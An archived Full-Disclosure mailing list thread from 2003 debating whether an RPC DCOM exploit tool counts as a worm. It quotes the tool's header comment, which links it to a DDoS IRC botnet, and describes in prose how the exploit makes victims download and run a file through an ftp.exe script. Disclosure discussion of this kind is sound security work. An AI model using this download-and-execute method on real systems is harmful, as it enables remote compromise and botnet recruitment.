| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: alf1num3rik at yahoo.com (Stephen) Subject: Re: DCOM Worm/scanner/autorooter !!! i confirm what joey said, the actual version do not replicate itself, but it's very very easy to a malicious lamer, to add options and commands to make a harder worm. indeed, the new version of the irc "worm" uses the universal offsets (http://www.k-otik.com/exploits/08.07.oc192-dcom.c.php) wich makes it more dangerous I think ! Regards. Stephen - Germany --- Joey <joey2cool@...oo.com> wrote: > i looked at the code and it is NOT a worm. > It can be deployed on several computers very fast, > but > it doesn't have the ability self replicate itself > from > the target computer. > > basically this exploit sends a command to create a > script for ftp.exe which it calls on by using "ftp > -s > scriptfile". The script contains the hostname, > username, password, and file to download. then it > runs > the file after its done downloading. > > This can easily be modified to run multiple > commands. > You can set it to download a Self extracting rar/zip > file and then run a batch file contained inside the > SFX file after its done extracting. > > there is a very fine line between proof of concept > code and worms. worms are highly illegal and if you > publish the code you can be held responsible so make > sure you are aware of this when posting here. this > exploit is NOT a worm but the potential for it to be > a > worm is there... > > --- roman.kunz@...iusbaer.com wrote: > > hi folks, > > > > already saw a re-edited one whitch has only two > > targets (just as the last > > sploit by k-otik). > > > > <cut> > > /* RPC DCOM WORM v 2.3 - > > * originally by volkam, fixed and beefed by > > uv/graff > > * even more original concept by LSD-pl.net > > * original code by HDM > > * > > * -- > > * This code is in relation to a specific DDOS > IRCD > > botnet project. > > * You may edit the code, and define which ftp to > > login > > * and which .exeutable file to recieve and run. > > * I use spybot, very convienent > > * - > > * So basicly script kids and brazilian children, > > this is useless to you > > * > > * - > > * shouts: darksyn - true homie , giver of 0d4yz, > > and testbeds > > * volkam - top sekret agent man > > * ntfx - master pupil > > * jpahk - true homie #2 > > * k3r0m - made that shit universal (2 > > targets WinXP - Win2k) > > * > > * Legion2000 Security Research (c) 2003 > > * - > > * enjoy! > > > > > > __________________________________ > Do you Yahoo!? > Yahoo! SiteBuilder - Free, easy-to-use web site > design software > http://sitebuilder.yahoo.com > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com
Powered by blists - more mailing lists